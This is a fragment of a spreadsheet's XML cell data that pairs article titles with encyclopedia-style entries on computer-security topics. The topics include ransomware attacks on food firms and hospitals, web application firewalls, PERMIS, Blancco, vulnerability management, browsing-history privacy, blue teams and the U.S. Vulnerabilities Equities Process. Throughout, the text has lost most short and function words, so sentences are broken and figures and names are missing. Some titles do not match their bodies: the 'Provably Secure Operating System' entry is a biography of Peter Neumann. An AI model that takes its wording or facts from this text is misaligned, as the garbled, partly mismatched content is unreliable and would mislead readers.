million ransom demand. cooperative inc., farming cooperative, said attack could significantly impact public supply grain, pork, chicken cannot bring systems back online.on october 2021 schreiber foods, wisconsin based milk distributor, victimized hackers demanding rumored $2.5 million ransom unlock computer systems. wisconsin milk handlers haulers reported getting calls schreiber saturday (oct. saying company’s computer systems plants couldn’t take milk contracted there. haulers schedulers forced find alternate homes milk.on april 2022 vincent hospital’s worcester massachusetts victim cyberattack sent wait times emergency room skyrocketing, patients saying unable doctor. vincent hospital’s statement reads: “tenet, parent company, experienced cybersecurity incident last week responded extensive protection protocols safeguard systems prevent unauthorized activity. during temporary disruption, saint vincent hospital continued care community utilizing established backup processes. time, critical applications restored resuming normal operations. parallel, tenet launched investigation, ongoing, taking additional measures protect patient, employee data. grateful physicians, nurses staff continuing provide safe, quality patient care work address matter.” aviation sector also affected disruptions cyber attacks. flights popular indian budget airline spicejet disrupted cyber attack 2022. unclear ransomware operation attacked spicejet, details shared extent damage caused. also timeline computer viruses worms comparison computer viruses list trojan horses references external links mcafee whitepaper blended threats[1]</t>
  </si>
  <si>
    <t>PEGASUS</t>
  </si>
  <si>
    <t>pegasis encryption algorithm used satellite telemetry, command link mission data transfers. according budget item justification document 2004–2005, cryptographic algorithm used global positioning systems (gps), space-based infrared systems (sbirs), milsatcom, special project systems. references external links pegasus products</t>
  </si>
  <si>
    <t>PERMIS</t>
  </si>
  <si>
    <t>permis (privilege role management infrastructure standards) sophisticated policy-based authorization system implements enhanced version u.s. national institute standards technology (nist) standard role-based access control (rbac) model. permis supports distributed assignment roles attributes users multiple distributed attribute authorities, unlike nist model assumes centralised assignment roles users. permis provides cryptographically secure privilege management infrastructure (pmi) using public encryption technologies x.509 attribute certificates maintain users' attributes. permis provide authentication mechanism, leaves application determine use. permis's strength comes ability integrated virtually application authentication scheme like shibboleth (internet2), kerberos, username/passwords, grid proxy certificates public infrastructure (pki). standard rbac system, permis's main entities authorisation policy, users, administrators (attribute authorities) assign roles/attributes users, resources protected, actions resources, access control rules, optional obligations constraints.the permis policy extensible markup language (xml)-based rules user-role assignments role-privilege assignments, latter containing optional obligations returned application user granted access resource. permis policy stored either simple text file, attribute within signed x.509 attribute certificate provide integrity protection tampering detection. user roles attributes held secure signed x.509 attributes certificates, stored lightweight directory access protocol (ldap) directories web-based distributed authoring versioning (webdav) repositories, created demand security assertion markup language (saml) attribute assertions. permis authorisation engine comprises components: credential validation service validates users' roles according user-role assignment rules, policy decision point (pdp) evaluates users' access requests according role-permission assignment rules access control rules). access resource depends upon roles/attributes assigned user, role-permission assignments, contain constraints based user's access request (e.g. "print less pages") environment (e.g. time day). permis work either push mode (the user attribute assignments sent permis application) pull mode (permis fetches attribute assignments ldap/webdav repositories saml attribute authorities). permis unique support cryptographically protecting user attributes/roles policy, guarantees integrity protects tampered with. features continually added like standard extensible access control markup language (xacml) interface allows permis xacml pdps seamlessly interchanged, ability accept saml attribute assertions, support dynamic delegation authority separation duty policies, recent addition controlled natural language interface english) writing simple permis policies. also authorisation identity management java authentication authorization service (jaas) lightweight directory access protocol (ldap) rbac (role-based access control) x.509 shibboleth saml (security assertion markup language) kerberos xacml (extensible access control markup language) (public infrastructure) references external links permis home page shibboleth project modular permis project nist rbac permis future development plans hardened permis</t>
  </si>
  <si>
    <t>Web audience measurement</t>
  </si>
  <si>
    <t>audience measurement (wam) audience measurement website analytics tool measures internet usage india. system, joint effort imrb international internet mobile association india surveys 6000 individuals across metropolitan centers india tracks variety metrics time-on-site, exposure, reach frequency internet usage.wam uses audience measurement continuous tracking panel study provides cross sectional data internet usage segmented gender, location. this panel-based approach uses metering technology, design indian context tracks computers. rating points factor multiple measures internet usage provide comprehensive picture advertisers attempts standardize analytics india. analytics market india currently fragmented, comscore vizisense imrb's competitors. several discussions revolve around difference numbers provided competitors digital audience measurement space. therefore, choosing right measurement partner imperative media stakeholders. this creates rifts users different audience measurement tools. references</t>
  </si>
  <si>
    <t>Blancco</t>
  </si>
  <si>
    <t>blancco ltd. international data security company specializes data erasure computer reuse corporations, governments computer remarketing companies. founded headquartered joensuu, finland, company operates offices across europe, north america, middle east, asia, australasia. blancco wholly owned subsidiary regenersis, strategic outsourcing company consumer technology companies. corporation history 1997, janne tervo väisänen co-founded carelian innovation ltd. company’s first data erasure product, blancco data cleaner, released 1999. then, 2000, carelian innovations ltd. changed name blancco ltd. microsystems blancco formed partnership 2007 deliver secure flexible data erasure solutions. 2007 blancco approved included nato information assurance product catalogue (niapc). company expanded product line 2008 introduction blancco client series added server support, data center edition, enables safe reuse hard drives mass storage environments clients sun, need deep data expunging.the company released blancco mobile smartphone erasure 2012. 2011, blancco launched 2012 blancco management console released. company also acquired dban 2012 received common criteria certification year. blancco acquired regenersis april 2014. leadership väisänen, managing director daniel smith, international sales director mark lambton, financial director sami tuupanen, director products services board directors dhody (cfo regenersis), chairman väisänen, managing director products blancco’s data wipe products scale single, reusable erasure tool software erasure requirements mass storage environments data centers. various versions support erasure different hardware configurations. supported hardware erasure certifications blancco’s security certificates approvals include: common criteria (iso 15408) communications electronics security group: united kingdom information technology group (cesg) approvals recommendations nato (listed nato information assurance product catalogue) awards 2013 strongest company finland suomen asiakastieto 2013 tivi company year award tietoviiko magazine 2012 company year kauppalehti op-pohjola group 2012 ernst young entrepreneur year award, finland 2012 president republic finland's internationalization award also data erasure data remanence computer recycling data destruction references</t>
  </si>
  <si>
    <t>Web application firewall</t>
  </si>
  <si>
    <t>application firewall (waf) specific form application firewall filters, monitors, blocks http traffic service. inspecting http traffic, prevent attacks exploiting application's known vulnerabilities, injection, cross-site scripting (xss), file inclusion, improper system configuration. history dedicated application firewalls entered market late 1990s time server attacks becoming prevalent. early version developed perfecto technologies appshield product, focused e-commerce market protected illegal page character entries. other early products, kavado gilian technologies, available market time, trying solve increasing amount attacks applications late 90s. 2002, open source project modsecurity formed order make technology accessible. they finalized core rule protecting applications, based oasis application security technical committee’s (was vulnerability work. 2003, expanded standardized rules open application security project’s (owasp) list, annual ranking security vulnerabilities. this list would become industry standard application security compliance.since then, market continued grow evolve, especially focusing credit card fraud prevention. with development payment card industry data security standard (pci dss), standardization control cardholder data, security become regulated sector. according ciso magazine, market expected grow $5.48 billion 2022. description application firewall special type application firewall applies specifically applications. deployed front applications analyzes bi-directional web-based (http) traffic detecting blocking anything malicious. owasp provides broad technical definition security solution application level technical point view depend application itself.” according information supplement requirement 6.6, defined security policy enforcement point positioned application client endpoint. this functionality implemented software hardware, running appliance device, typical server running common operating system. stand-alone device integrated network components.” words, virtual physical appliance prevents vulnerabilities applications exploited outside threats. these vulnerabilities application legacy type insufficiently coded design. addresses code shortcomings special configurations rule-sets, also known policies. previously unknown vulnerabilities discovered penetration testing vulnerability scanner. application vulnerability scanner, also known application security scanner, defined samate nist 500-269 automated program examines applications potential security vulnerabilities. addition searching application-specific vulnerabilities, tools also look software coding errors.” resolving vulnerabilities commonly referred remediation. corrections code made application typically prompt response necessary. situations, application custom policy unique application vulnerability provide temporary immediate (known virtual patch) necessary. wafs ultimate security solution, rather meant used conjunction network perimeter security solutions network firewalls intrusion prevention systems provide holistic defense strategy. wafs typically follow positive security model, negative security, combination mentioned sans institute. wafs combination rule-based logic, parsing, signatures detect prevent attacks cross-site scripting injection. general, features like browser emulation, obfuscation virtualization well obfuscation used attempt bypass wafs. owasp produces list application security flaws. commercial offerings cover flaws minimum. there non-commercial options well. mentioned earlier, well-known open source engine called modsecurity options. engine alone insufficient provide adequate protection, therefore owasp along trustwave's spiderlabs help organize maintain core-rule github modsecurity engine. deployment options although names operating mode differ, wafs basically deployed inline three different ways. according labs, deployment options transparent bridge, transparent reverse proxy, reverse proxy. 'transparent' refers fact http traffic sent straight application, therefore transparent client server. this contrast reverse proxy, acts proxy client’s traffic sent directly waf. separately sends filtered traffic applications. this provide additional benefits masking introduce disadvantages performance latency. also application firewall payment card industry data security standard (pci dss) application software service (saas) computer security network security application security application security references</t>
  </si>
  <si>
    <t>Adtech (company)</t>
  </si>
  <si>
    <t>adtech german–american digital marketing company retails products manage, serve evaluate online advertising campaigns (including display, video mobile formats). company founded 1998 frankfurt, germany, acquired portal 2007. company merged oath inc. brand, subsidiary verizon communications. history adtech founded 1998 frankfurt, germany, michael stusch michael schultheiß. 2000, american internet holding company cmgi acquired controlling interest (80%) adtech. during year, adtech became private limited company. based adforce inc.’s technology, adtech opened first data center frankfurt (germany) 1998. 2001, adtech delivered billionth banner 2002 adtech supplied 100,000th advertising campaign delivered million banners every day. 2004, adforce technology replaced adtech's serving technology. shortly after, second serving data center launched frankfurt. 2007, announced acquisition adtech adtech acquired provide serving platform enabling website publishers manage, traffic report online advertising campaigns. after operating independent wholly owned subsidiary aol's advertising.com division, ad-serving platform advertising (previously platform-a), company november 2018 part oath inc., owned verizon communications. products adtech provides integrated serving platform. this product allows publishers, advertisers, agencies networks ability manage display, video mobile digital advertising campaigns. adtech's server responds banner requests, prompted user's browsers, delivers specified system provision terminals must online. open design adtech adservers allows implementation external technologies. targeting, adtech collaborates vendors nugg wunderloop. integrated management fall 2007, adtech presented integrated suite display, video mobile serving technologies digital publishers ad:tech london ad:tech york. collaboration technology partners lightningcast third screen media, adtech merged video mobile applications directly existing user interface reporting system.according adtech, digital advertisements distributed mobile devices type, including mobile smart phones. their customers also able apply selective targeting options address advertiser needs. research since 2004, adtech interprets banner requests servers periodical analyses europe. adtech surveys document different aspects internet usage, ranging browser trends click-through rates. they also serve reference professional articles trends digital marketing industry. references</t>
  </si>
  <si>
    <t>Blancco Technology Group</t>
  </si>
  <si>
    <t>blancco technology group global provider mobile device diagnostics secure data erasure products. company divided distinct business units: blancco (data erasure) smartchk (mobile diagnostics). data erasure solution providers, blancco technology group holds highest number certifications, approvals, recommendations national international governing bodies, including united states department defense, nato, saarland dipcog. company profile originally known regenersis (lse: rgs), blancco technology group (lse: bltg) formed 2016 result number software business acquisitions. following acquisitions, regenersis disposed repair division focus pure-play software business renamed blancco technology group plc. company divided distinct business units: blancco (data erasure) smartchk (mobile diagnostics). blancco technology group employs people worldwide across north america, europe, asia australia. company headquartered alpharetta, united states. products technologies certified data erasure software hardware: blancco mobile device diagnostics software business intelligence: smartchk history blancco technology group started regenersis plc, provider diagnostics, repair data erasure services consumer electronics industry. regenersis filed 2005 public company london stock exchange. year, acquired intec group (intec cellular services intec distribution). partnerships blancco technology group partners multiple resellers distributors, including asset disposition vendors, mobile services recycling providers, data centers cloud storage providers. references external links official website</t>
  </si>
  <si>
    <t>W00w00</t>
  </si>
  <si>
    <t>w00w00 (pronounced whoo-whoo) computer security think tank founded 1996 still active early 2000s. although group well known outside information security circles, participants spawned dozen companies. famous examples whatsapp, messaging service, napster, pioneering file-sharing company. participants official website, explicitly states "there members participants," point included active participants spanned countries five continents.the following list w00w00's participants: notable companies number well known companies established participants. arbor networks napster nmap whatsapp references external links "w00w00 website". archived original december 2020.</t>
  </si>
  <si>
    <t>Xtralis</t>
  </si>
  <si>
    <t>xtralis, part honeywell, privately held firm. manufactures smoke detection, detection video surveillance security products early detection, visual verification, prevention fire intrusion threats. company history xtralis ltd. founded 1982 incorporated 1983 name vision fire security ltd. headquarters located dublin, ireland. xtralis acquired companies: asim technologies 2007) group (also 2007). 2011 xtralis acquired company heitel digital video gmbh. today company operates countries employs people. headquarters fire environmental division company melbourne headquarters security applications division brussels.on february 2016, honeywell entered definitive agreement acquire xtralis. products xtralis manufactures vesda icam brand aspirating smoke detectors (asd). they also produce eco, attachment module vesda icam smoke detectors detects gases attaching pipe network sampling drawing detector. alarms designed order work variety environments, semiconductor clean rooms, data centers, warehouses, manufacturing facilities, mining facilities—a range clean dirty hazardous environments. 2011 xtralis began producing non-asd system, called osid, uses optical detector sense infrared ultraviolet wavelengths detect smoke. system awarded north american fire life safety product innovation award frost sullivan. xtralis smoke detection systems used third fortune companies.adpro xtralis' main line security products, features video audio recording, transmission, video content analytics; access control; intrusion detection systems; passive infrared sensors (pirs) designed outdoor protection detection individuals feet away. adpro technology uses algorithms screen non-threatening factors order reduce frequency false alarms. through heitel group, xtralis also sells digital video recording transmission equipment remote monitoring. xtralis security systems used approximately fortune companies.xtralis smoke detectors security systems installed european parliament brussels, corporate locations volkswagen renault. other major institutions utilize xtralis systems are: nasa, dome rock, clinton presidential center, hearst castle, majesty's prison service, heathrow airport, eurostar railway system. references</t>
  </si>
  <si>
    <t>Qumranet</t>
  </si>
  <si>
    <t>qumranet, inc. enterprise software company offering desktop virtualization platform based hosted desktops kernel-based virtual machines (kvm) servers, linked spice protocol. company also creator, maintainer global sponsor open source hypervisor. history company founded 2005 benny schnaider, rami tamir president, moshe cto, chairman giora yaron. qumranet raised million financing rounds founders, norwest venture partners, cisco systems, sequoia capital, addition investment founding partners.the company's first product, named "solid ice", hosted windows linux desktops central servers located data center.the ra'anana-based company developed virtualization technology data centers.from low-profile israeli startup company made waves rapid acceptance linux kernel, solid desktop virtualization platform received serious attention.avi kivity lead developer maintainer kernel-based virtual machine project mid-2006, part linux kernel since 2.6.20 release february 2007.qumranet gartner group's 2008 list "cool vendors," award given small companies advanced technology.on september 2008, qumranet acquired hat, inc. $107 million. executives benny schnaider, co-founder, chief executive officer director rami tamir, co-founder, president director moshe ph.d. co-founder chief technology officer giora yaron ph.d, co-founder chairman board shmil levy, board member, sequoia capital goel, board member, norwest venture partners references external links http://www.qumranet.com/ (archived version)</t>
  </si>
  <si>
    <t>Vulnerability management</t>
  </si>
  <si>
    <t>vulnerability management "cyclical practice identifying, classifying, prioritizing, remediating, mitigating" software vulnerabilities. vulnerability management integral computer security network security, must confused vulnerability assessment.vulnerabilities discovered vulnerability scanner, analyzes computer system search known vulnerabilities, open ports, insecure software configurations, susceptibility malware infections. they also identified consulting public sources, nvd, subscribing commercial vulnerability alerting service symantec's deepsight vulnerability datafeed accenture's vulnerability intelligence service. unknown vulnerabilities, zero-day, found fuzz testing. fuzzy testing identify certain kinds vulnerabilities, buffer overflow relevant test cases. such analysis facilitated test automation. addition, antivirus software capable heuristic analysis discover undocumented malware finds software behaving suspiciously (such attempting overwrite system file). correcting vulnerabilities variously involve installation patch, change network security policy, reconfiguration software, educating users social engineering. project vulnerability management project vulnerability project's susceptibility subject negative events, analysis impact, project's capability cope negative events. based systems thinking, project systemic vulnerability management takes holistic vision, proposes following process: project vulnerability identification. vulnerability analysis. vulnerability response planning. vulnerability controlling includes implementation, monitoring, control, lessons learned. coping negative events done, model, through: resistance static aspect, referring capacity withstand instantaneous damage, resilience dynamic aspect, referring capacity recover time.redundancy specific method increase resistance resilience vulnerability management.antifragility concept introduced nassim nicholas taleb describe capacity systems resist recover adverse events, also improve them. antifragility similar concept positive complexity proposed stefan morcov. also application security full disclosure long-term support risk risk management project management project complexity references external links "implementing vulnerability management process". sans institute.</t>
  </si>
  <si>
    <t>Administrative domain</t>
  </si>
  <si>
    <t>administrative domain service provider holding security repository permitting easily authenticate authorize clients credentials. this particularly applies computer network security. this concept captured 'admindomain' class glue information model.an administrative domain mainly used intranet environments. implementation implemented collection hosts routers, interconnecting network(s), managed single administrative authority. interoperation different administrative domains different security repositories, different security software different security policies notoriously difficult. therefore, administrative domains wishing interoperation full interoperability build federation. references</t>
  </si>
  <si>
    <t>Web browsing history</t>
  </si>
  <si>
    <t>browsing history refers list pages user visited, well associated metadata page title time visit. usually stored locally browsers order provide user history list back previously visited pages. reflect user's interests, needs, browsing habits.all major browsers private browsing mode browsing history recorded. this protect browsing history collected third parties targeted advertising purposes. applications local history locally stored browsing history facilitate rediscovering lost previously visited pages vague memory mind, pages difficult find located within deep web. browsers also utilize enable autocompletion address quicker convenient navigation frequently visited pages.the retention span browsing history varies internet browser. mozilla firefox (desktop version) records history indefinitely default inside file named places.sqlite, automatically erases earliest history upon exhausted disk space, google chrome (desktop version) stores history weeks default, automatically pruning earlier entries. indefinite history file named archived history recorded, removed automatically deleted version released september 2014.browser extensions history trends unlimited google chrome (desktop version) allow indefinite local storage browsing history, exporting portable file, self-analysis browsing habits statistics.browsing history recorded using private browsing mode provided browsers. targeted advertising targeted advertising means presenting user advertisements relevant based one's browsing history. typical example user receiving advertisements shoes browsing websites searching shoes shopping websites. research shows targeted advertising doubles conversion rate classical online advertising.real-time bidding(rtb) method used behind targeted advertising. system automatically bids price presenting advertisements certain websites. advertisers decide much willing based target audience websites. therefore, information users could encourage advertisers higher prices. information users, browsing history, provided firms involved bidding. since real-time process, information usually collected without consent user transferred unencrypted form. user limited knowledge information collected, stored, used.the response user towards targeted advertising depends whether knows information collected. user already knows information collected ahead time, targeted advertisement could potentially create positive effect, leading higher intention clicking link. however, user informed information collection, would concerned privacy. this decrease one's intention clicking link. meanwhile user considers website reliable, possible click link accept personalization service.to solve conflicts privacy profits, newly proposed system pay-per-tracking. broker exists users advertisers. users could decide whether provide personal information broker broker would send personal information offered users advertisers. meanwhile, users could receive monetary rewards sharing personal information. this could help protect privacy tracking efficiency, would lead extra cost. personalized pricing personalized pricing based idea user purchases certain product frequently pays higher price product, user could charged higher price product. browsing history could give reliable predictions purchasing behaviors users. when using personalized pricing, profit firms could increase 12.99% compared status cases. research browsing history could used facilitate research, revealing browsing behavior people. when user browses extensively site, probability requesting additional page increases. when user visits sites, likelihood requesting extra pages reduces.web browsing history could also used create personal libraries. personal library created collecting analyzing browsing history user. could help user notice browsing trends, time distribution, frequently used websites. some users regard function helpful. privacy concerns browsing history stored locally published anywhere publicly default. however, almost websites tracked adwares potentially unwanted programs (pups) collect users' information without consent. these tracking methods usually allowed platforms default. browsing history also collected cookies websites, could divided kinds, first-party cookies third-party cookies. third-party cookies usually embedded first-party websites collect information them. third-party cookies higher efficiency data aggregation ability first-party cookies. while first-party cookies access users' data website, third-party cookies could combine data collected different websites make image user complete. meanwhile, several third-party cookies could exist website.with enough information available, users could identified without logging accounts.when third-party cookies collect browsing history users multiple websites, information leads privacy concerns. example, user browses news website searches medical information website. when browsing history websites combined, user considered interested news related medical topics. when browsing history different websites combined, could reflect complete image person. scandals 2006, released large amount data users, including search history. although user names included, users could identified based browsing history released. example, user 4417749 identified search history three months.in 2020, avast, popular antivirus software, accused selling browsing history third parties. preliminary investigation accusation officials czech republic. report shows avast sold users' data jumpshot, marketing analytics tool. avast claimed users' personal information included leak. however, browsing history could used identify users. avast shut jumpshot reply issue. protection when user feels risk privacy, one's intention disclosing personal information lower, actions affected. however, studies finds significant difference intention actions disclosing private information, meaning user reduce actions sharing personal information take protection measures feeling concerned privacy. when users privacy concerns, would make less online services. they would also make protection measures refusing offer information, offering false information, removing information online complaining people around relevant organizations.however, hard users protect privacy multiple reasons. first, users enough privacy awareness. they concerned tracked unless substantial impacts them. they also aware data contains commercial values. generally difficult users notice privacy policy links kinds websites, female users older users, likely ignore notices. even users notice privacy links, information disclosure affected. addition, users also equipped enough technical knowledge protect even notice privacy leakage. they placed passive side little room change situation.most users make blockers, delete cookies, avoid websites collect personal information protect browsing history collected. however, blockers offer enough guidance users help improve privacy awareness. more importantly, rely standard black white list. these lists usually include websites tracking users. blockers could effective tracking domains blocked.there series open source projects protect privacy collecting browsing history hard drive instead browser. solves issue users cannot browsing history data user deletes data browser. references</t>
  </si>
  <si>
    <t>Best Enemies</t>
  </si>
  <si>
    <t>best enemies education resource film created ross darren bark discusses cyber bullying problem australian schools, explores tackle help students become pro-active reporting stopping programs services best enemies also used community-based education program illustrates issue cyber bullying film based true story 15-year-old girl whose best friend betrayed bullying campaign conducted online messaging.the program targets schools youth organisations address causes consequences serious social problem cyber bullying cyber safety. program supported youth interagency groups, department education training various agencies government. best enemies study guide cybersafety resource produced australian teachers media also distributed education shop.the program supported hoyts, girlfriend magazine, mentos cube, myspace point zero youth services. partnership bully free australia foundation march 2013, best enemies bully free australia foundation signed partnership agreement vision "protect empower australian children adolescents live fulfilling life free forms bullying". march 2013, prime minister, julia gillard formally opened bully free australia foundation essendon airport crowd people. references external links "cyber bullying" 2009 private members statements parliament south wales parliament south wales "best enemies education program" best enemies education program "pillow-talking bully girls" 2010 news north shore times north shore times "it’s time connected mental health" 2010 ku-ring-gai council mental health forum ku-ring-gai council ku-ring-gai council</t>
  </si>
  <si>
    <t>PacketTrap</t>
  </si>
  <si>
    <t>packettrap provider network management traffic analysis software midsize companies. history packettrap founded 2006 headquartered francisco, california. received million series venture capital august capital 2007.the company purchased quest software 2009. packettrap bought dell 2012 part buyout quest. dell discontinued development software 2013. packettrap established enough companies continued support legacy product licensing agreements dell. features packettrap features included desktop management, server management, monitor cloud assets, others. also comparison network monitoring systems references external links packettrap's products services startup city informationweek network world, denise dubie, nov, 2008. management companies watch" information week, john foley, aug, 2008. "packettrap challenges ibm" microsoft technet, greg steen, july, 2008. "new products pros" magazine, jamie bernstein, may, 2008. "review: packettrap pt360" network world, denise dubie, march, 2008 "kicking tires management software" what tony luke, feb, 2008. tough crack" information week, john foley, feb, 2008. "the demise commercial open source"</t>
  </si>
  <si>
    <t>Akoin</t>
  </si>
  <si>
    <t>akoin (akn) cryptocurrency developed senegalese-american singer akon. akon co-founder chairman akoin along karas lynn lisa. akon process building utopian city, akon city, senegal, would accept akoin currency. billion city akon proposes described "real-life wakanda". also list cryptocurrencies references</t>
  </si>
  <si>
    <t>BeyondCorp</t>
  </si>
  <si>
    <t>beyondcorp implementation, google, zero-trust computer security concepts creating zero trust network. created response 2009 operation aurora. open source implementation inspired google's research paper access proxy known "transcend". security mechanisms unlike traditional vpns, beyondcorp's access policies based information device, state, associated user. beyondcorp considers internal networks external networks completely untrusted, gates access applications dynamically asserting enforcing levels, “tiers,” access. also radius references</t>
  </si>
  <si>
    <t>Voluntary collective licensing</t>
  </si>
  <si>
    <t>voluntary collective licensing alternative approach solve problem software piracy using file sharing technologies. idea make file sharing networks subscribe-only small distribute collected money among artists based popularity work. endorsed since 2003 eff. arguably spotify implementation idea, although marketed file-sharing network also allows ad-supported free addition paid use. supporters licensing project downhill battle berkman center internet society also launched digital media exchange (dmx), content service, operated non-profit cooperative uses concept. also threshold pledge system references external links description white paper website "building tools legalize video-sharing" janko roettgers, times: 2009</t>
  </si>
  <si>
    <t>PACTF</t>
  </si>
  <si>
    <t>pactf annual web-based computer security capture flag (ctf) competition middle high school students. founded group students phillips academy andover, massachusetts. competition's sponsors include abbot academy association phillips academy; information networking institute cylab carnegie mellon university; hariri institute computing, massachusetts open cloud (moc) project, modular approach cloud security (macs) project boston university; entities.this competition follows jeopardy format, teams “hack, decrypt, reverse, whatever takes solve increasingly challenging security puzzles." once team successfully determines security vulnerability purposefully left problem material executes attack, obtain answer string called "flag." submitting correct flag, teams receive feedback points improve ranking.in april 2016, 1000 teams united states countries participated competition. second third pactf competitions took place spring 2017 2018 similar scales. fourth pactf competition took place 2019. references</t>
  </si>
  <si>
    <t>Provably Secure Operating System</t>
  </si>
  <si>
    <t>peter gabriel neumann (born 1932) computer-science researcher worked multics operating system 1960s. edits risks digest columns software engineering notes communications acm. founded sigsoft fellow acm, ieee, aaas. early life education neumann holds three degrees harvard university: a.b. mathematics, 1954; s.m. (1955) ph.d. (1961) applied mathematics science. held fulbright scholarship germany 1958–1960. while student harvard, two-hour breakfast albert einstein, november 1952, discussing simplicity design. career neumann worked bell labs 1960 1970. worked international menlo park, california since 1971. before risks mailing list, neumann known provably secure operating system (psos).neumann worked dorothy denning 1980s develop computer intrusion detection system known ides model later computer security software. memberships awards neumann long served moderator risks digest member accurate project.neumann founding editor software engineering notes (sen), fellow acm.in 2018, neumann received epic lifetime achievement award electronic privacy information center. selected publications neumann, peter computer-related risks, addison-wesley/acm press, isbn 0-201-55805-x, 1995. references external links home page short biography risks forum archive peter neumann oral history, charles babbage institute, university minnesota john markoff (2012-10-30). "killing computer save (profile neumann)". york times. archived original 2012-11-09.</t>
  </si>
  <si>
    <t>BlueHat</t>
  </si>
  <si>
    <t>bluehat blue blue-hat) term used refer outside computer security consulting firms employed test system prior launch, looking exploits closed. particular, microsoft uses term refer computer security professionals invited find vulnerability products windows. blue microsoft hacker conference blue microsoft hacker conference invitation-only conference created window snyder intended open communication microsoft engineers hackers. event mutual understanding well occasional confrontation. microsoft developers visibly uncomfortable metasploit demonstrated. also hacker culture hacker ethic black hacker references external links microsoft's bluehat security briefings bluehat security briefings blog bluehat security homeland security consultants fedramp</t>
  </si>
  <si>
    <t>PARRY</t>
  </si>
  <si>
    <t>parry early example chatbot, implemented 1972 psychiatrist kenneth colby. history parry written 1972 psychiatrist kenneth colby, stanford university. while eliza tongue-in-cheek simulation rogerian therapist, parry attempted simulate person paranoid schizophrenia. program implemented crude model behavior person paranoid schizophrenia based concepts, conceptualizations, beliefs (judgements conceptualizations: accept, reject, neutral). also embodied conversational strategy, much serious advanced program eliza. described "eliza attitude".parry tested early 1970s using variation turing test. group experienced psychiatrists analysed combination real patients computers running parry teleprinters. another group psychiatrists shown transcripts conversations. groups asked identify "patients" human computer programs. psychiatrists able make correct identification percent time figure consistent random guessing.parry eliza (also known "the doctor") "met" several times. famous exchanges occurred iccc 1972, parry eliza hooked arpanet "talked" other. also history natural language processing notes references external links parry's source code original lisp code parry.</t>
  </si>
  <si>
    <t>Ping Identity</t>
  </si>
  <si>
    <t>ping identity corporation american software company established 2002 andre durand bryan field-elliot. headquartered denver, colorado, united states development offices vancouver, british columbia, aviv, israel, austin, texas, denver, colorado, boston, massachusetts. ping also european operations offices london, paris, switzerland well offices bangalore, melbourne, tokyo, serving asia-pacific. company's software provides federated identity management self-hosted identity access management identities attribute based access controls, similar identity management system tools developed microsoft okta. single sign-on (sso) option gives users single credentials access applications (web applications, apps mobile devices, vpn, etc) company data. this primarily done identity providers ping, okta, microsoft azure leveraging open standards saml oauth. ping identity products include pingid, pingfederate, pingone, pingaccess, pingdirectory, pingdatagovernance, pingintelligence. along okta, microsoft, salesforce, google, comprise "identity meta system" defined "design rationale behind identity metasystem architecture". history ping identity corporation software company established 2002 andre durand bryan field-elliot, denver, colorado. ping identity provides federated identity management self-hosted identity access management (iam) solutions identities single sign-on solutions, number organizations competing provide standards replace passwords authenticating applications.ping identity received number rounds funding, beginning series april 2004. since then, received million kohlberg kravis roberts september 2014, million growth capital partners july 2013, well million silicon valley bank, triangle peak partners june 2011, million appian ventures.vista equity partners, private equity firm based austin, texas, acquired majority ownership ping identity leveraged buyout $600 million june 2016. time sale, ping identity already taken $125 million funding.in september 2019, vista equity partners took company public rather selling goldman sachs ping identity's initial public offering (ipo).ping identity holding corp initially listed york stock exchange 12,500,000 shares common stock $15.00 share. value stock rose first jumped increase market debut. this first organization vista holdings took public. vista retains ownership company.in august 2022, thoma bravo agreed ping identity $2.8 billion all-cash transaction. references external links official website business data ping identity:</t>
  </si>
  <si>
    <t>Blue team (computer security)</t>
  </si>
  <si>
    <t>blue team group individuals perform analysis information systems ensure security, identify security flaws, verify effectiveness security measure, make certain security measures continue effective implementation. history part united states computer security defense initiative, teams developed exploit malicious entities would harm. result, blue teams developed design defensive measures team activities. incident response incident occur within organization, blue team perform following steps handle situation: preparation identification containment eradication recovery lessons learned operating system hardening preparation computer security incident, blue team perform hardening techniques operating systems throughout organization. perimeter defense blue team must always mindful network perimeter, including traffic flow, packet filtering, proxy firewalls, intrusion detection systems. tools blue teams employ wide range tools allowing detect attack, collect forensic data, perform data analysis make changes threat future attacks mitigate threats. tools include: management analysis alienvault fortisiem (a.k.a. accelops) graylog intrust logrhythm netwitness qradar (ibm) rapid7 siemonster solarwinds splunk security information event management (siem) technology siem software supports threat detection security incident response performing real-time data collection analysis security events. this type software also uses data sources outside network including indicators compromise (ioc) threat intelligence. also list digital forensics tools vulnerability management white (computer security) team references</t>
  </si>
  <si>
    <t>Vulnerabilities Equities Process</t>
  </si>
  <si>
    <t>vulnerabilities equities process (vep) process used u.s. federal government determine case-by-case basis treat zero-day computer security vulnerabilities; whether disclose public help improve general computer security, keep secret offensive government's adversaries.the first developed period 2008–2009, became public 2016, government released redacted version response foia request electronic frontier foundation.following public pressure greater transparency wake shadow brokers affair, u.s. government made public disclosure process november 2017. participants according plan published 2017, equities review board (erb) primary forum interagency deliberation determinations concerning vep. meets monthly, also convened sooner immediate need arises. consists representatives following agencies: office management budget office director national intelligence (including intelligence community-security coordination center) united states department treasury united states department state united states department justice (including federal bureau investigation national cyber investigative joint task force) department homeland security (including national cybersecurity communications integration center united states secret service) united states department energy united states department defense include national security agency, including information assurance signals intelligence elements), united states cyber command, cyber crime center) united states department commerce central intelligence agencythe national security agency serves executive secretariat vep. process according november 2017 version vep, process follows: submission notification when agency finds vulnerability, notify secretariat soon possible. notification include description vulnerability vulnerable products systems, together agency's recommendation either disseminate restrict vulnerability information. secretariat notify participants submission within business day, requesting respond relevant interest. equity discussions agency expressing interest must indicate whether concurs original recommendation disseminate restrict within five business days. not, hold discussions submitting agency secretariat within seven business days attempt reach consensus. consensus reached, participants suggest options equities review board. determination disseminate restrict decisions whether disclose restrict vulnerability made quickly, full consultation concerned agencies, overall best interest competing interests missions u.s. government. possible, determinations based rational, objective methodologies, taking account factors prevalence, reliance, severity. review board members cannot reach consensus, vote preliminary determination. agency equity disputes decision, may, providing notice secretariat, elect contest preliminary determination. agency contests preliminary determination, treated final decision. handling follow-on actions vulnerability information released, done quickly possible, preferably within seven business days. disclosure vulnerabilities conducted according guidelines agreed members. submitting agency presumed knowledgeable vulnerability and, such, responsible disseminating vulnerability information vendor. submitting agency elect delegate dissemination responsibility another agency behalf. releasing agency promptly provide copy disclosed information secretariat record keeping. additionally, releasing agency expected follow-up determine whether vendor's action meets government requirements. vendor chooses address vulnerability, acting urgency consistent risk vulnerability, releasing agency notify secretariat, government take mitigation steps. criticism process criticized number deficiencies, including restriction non-disclosure agreements, lack risk ratings, special treatment nsa, less whole-hearted commitment disclosure default option. references also cyber-arms industry tailored access operations</t>
  </si>
  <si>
